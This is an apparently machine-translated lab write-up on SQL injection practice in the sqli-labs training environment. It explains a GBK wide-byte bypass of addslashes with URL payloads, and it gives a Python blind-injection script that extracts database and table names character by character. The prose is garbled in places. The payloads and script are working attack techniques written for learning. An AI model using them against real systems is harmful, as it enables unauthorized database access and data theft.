Byte wide injection
First look at the basic list of url encoding
Expressly | url encoded |
---|---|
Blank | %20 |
’ | %27 |
# | %23 |
\ | %5c |
addslashes function:
addslashes () function returns a backslash character string is added before the predefined characters.
Predefined characters are:
- apostrophe(')
- Double quotes(")
- The backslash (\)
- NULL
How to escape from the function addslashes out:
a: the \ front plus a \ (single or several) into \\ ', so that \ is escaped to' limit the escape
2: the \ did not get in mysql using GBK encoded, the two characters are considered to be a character (ASCII code to a front of greater than 128, before reaching the range of characters)
Kanji two characters
\ Encoding 'is% 5c% 27
We 'front plus% df becomes% df \'
is the% df% 5c% 27, after GBK decode the
changes to the transport ', successfully bypassed.
conduct experiment
Experimental environment: sqlilabs-less-32
local drone built on a wide byte injection problem somehow can not be used, and to set up a virtual machine sqlilabs, it took some time. Cried
We begin testing! ! !
?id=1%27--+
Found with the addslashes () function, try using a% df
?id=1%df%27--+
GBK coding is described, can be injected.
?id=-1%df%27 union select 1,2,3--+
Injection with a union joint to the back thing to note is that where table_name = '' single quote can not be used, use another method: Hex
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
Scripting
Learn to write a python script, sqlmap not a panacea, learning one morning and found that too much knowledge library requests, come slowly
experimental environment: sqlilabs-less-8
to write the most simple Boolean blind script, first of all the requests need python library, pip download it
import requests
dic = 'abcdefghijklmnopqrstuvwsyz'
database = ''
for x in xrange(1,10):
for i in dic:
url = "http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),%d,1)='%c'--+" %(x,i)
try:
response = requests.get(url,timeout = 5)
if response.content.find('You are in...........') != -1:
database = database + i
print database
break
except Exception,e:
pass
print database
The main thing is the judge, if found You are in ... not to -1, execute the following statement. If you do not find on -1, not executed if statement.
if response.content.find('You are in...........') != -1:
The next sentence can change the url
url = "http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),%d,1)='%c'--+" %(x,i)
limit 0,1 also be one cycle, not here in my demonstration. In short python script to use more flexible, or should write about the good.